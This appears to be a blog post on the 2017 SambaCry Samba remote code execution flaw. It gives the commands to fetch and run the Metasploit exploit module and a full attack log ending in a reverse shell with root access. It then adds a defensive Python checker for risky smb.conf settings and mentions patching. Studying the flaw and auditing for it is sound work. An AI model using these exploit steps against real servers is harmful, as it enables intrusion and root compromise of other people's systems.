Hmm, it looks like a Remote Code Exploit is also hitting Samba File Sharing on Linux? Will there be a Linux version of WannaCry that takes advantage of this hole? Or should it be named Sambacry?
wget https://raw.githubusercontent.com/hdm/metasploit-framework/0520d7cf76f8e5e654cb60f157772200c1b9e230/modules/exploits/linux/samba/is_known_pipename.rb -O /path/to/metasploit/modules/exploits/linux/samba/sambacry.rb
msfconsole
msf > use exploit/linux/samba/sambacry
msf exploit(sambacry) >
Logs:
[*] Started reverse TCP handler on 192.168.48.1:4444
[*] 192.168.48.151:445 - Using location 192.168.48.151shared for the path
[*] 192.168.48.151:445 - Payload is stored in //192.168.48.151/shared/ as nCiuzQVt.so
[*] 192.168.48.151:445 - Trying location /volume1/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /volume1/shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /volume1/SHARED/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /volume1/Shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /volume2/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /volume2/shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /shared/shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /shared/SHARED/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /shared/Shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /mnt/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /mnt/shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /mnt/SHARED/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /mnt/Shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /mnt/usb/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /mnt/usb/shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /mnt/usb/SHARED/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /mnt/usb/Shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /media/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /media/shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /media/SHARED/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /media/Shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /mnt/media/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /mnt/media/shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /mnt/media/SHARED/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /mnt/media/Shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /var/samba/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /var/samba/shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /var/samba/SHARED/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /var/samba/Shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /tmp/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /tmp/shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /tmp/SHARED/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /tmp/Shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /home/nCiuzQVt.so...
[*] Command shell session 2 opened (192.168.48.1:4444 -> 192.168.48.1:45072) at 2017-05-24 19:40:33 -0500
id
uid=0(root) gid=0(root) groups=0(root),100(users)
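The log above shows the two things the module depends on: a share it can write a .so into, and a pipe-name request that makes smbd load that file from a guessed server-side path. As an added example (not from the original post and not Metasploit code), this Python check flags smb.conf shares that are writable while `nt pipe support` is left at its default of yes; the sample config and its paths are constructed, and `include` files and `write list` are not handled.

```python
SAMPLE_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
[shared]
   path = /volume1/shared
   read only = no
   guest ok = yes
[docs]
   path = /srv/docs
   read only = yes
"""  # constructed sample config, not taken from the post's target
TRUE = {"yes", "true", "1"}  # Samba boolean spellings for "on"

def parse_smb_conf(text):
    """Return {section: {key: value}}; names lowercased, whitespace removed."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = sections.setdefault(line[1:-1].strip().lower(), {})
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            current["".join(key.lower().split())] = value.strip()
    return sections

def writable_setting(section):
    """True/False if the section sets writability, None if it is silent."""
    for key in ("writable", "writeable", "writeok"):
        if key in section:
            return section[key].lower() in TRUE
    if "readonly" in section:
        return section["readonly"].lower() not in TRUE
    return None

def audit(text):
    """List (share, path, guest_ok) for writable shares while pipes are on."""
    conf = parse_smb_conf(text)
    glob = conf.get("global", {})
    if glob.get("ntpipesupport", "yes").lower() not in TRUE:
        return []  # workaround "nt pipe support = no" is set in [global]
    findings = []
    for name, share in conf.items():
        own = writable_setting(share)  # None: the [global] default applies
        writable = writable_setting(glob) if own is None else own
        if name != "global" and writable:
            guest = share.get("guestok", share.get("public", "no")).lower() in TRUE
            findings.append((name, share.get("path", "?"), guest))
    return findings
```

Running `audit(SAMPLE_SMB_CONF)` reports the guest-writable `shared` share. Upgrading Samba is the fix; `nt pipe support = no` is a workaround and can disable some functionality Windows clients expect.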
If anything is unclear, feel free to ask. Happy exploiting.